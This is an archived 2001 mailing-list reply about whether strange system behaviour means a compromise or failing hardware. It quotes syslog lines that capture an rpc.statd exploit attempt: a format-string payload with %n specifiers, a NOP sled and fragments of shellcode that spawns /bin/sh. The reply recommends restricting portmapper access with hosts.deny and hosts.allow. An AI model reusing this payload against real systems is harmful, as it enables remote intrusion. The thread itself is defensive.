[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Re: Suspicious behavior: cracked or just a dying machine?

On 15 Aug 2001 13:01:47 -0300, Miguel Griffa wrote:
> did u try memtest?
> I had really wierd behaviour and memory was _totally_ broken... I still 
> wonder how the hell it managed to boot...
> replacing memory did the magic
snip

> >Aug 14 17:38:43 nujoma /sbin/rpc.statd[257]: gethostbyname error for
> >^X<F7><FF>
> ><BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><FF><BF>^[<F7>
> ><FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220
> >\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> >\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> >\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> >\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> >\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> >\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> >\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> >\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> >\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> >\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> >\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
> >Aug 14 17:38:43 nujoma
> ><C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\21
> >1<F3><B0>^K<CD>\200<B0>^A<CD>\200<E8>\177<FF><FF><FF>

Protect your portmapper with /etc/hosts.deny and /etc/hosts.allow and
you won't get these buffer overflow attacks squatting in your syslogs
anymore.  I only allow 127.0.0.1 and my internal networks to touch the
portmapper.  Everyone else no access, stopped me from getting those
attacks.

--mike
Reply to: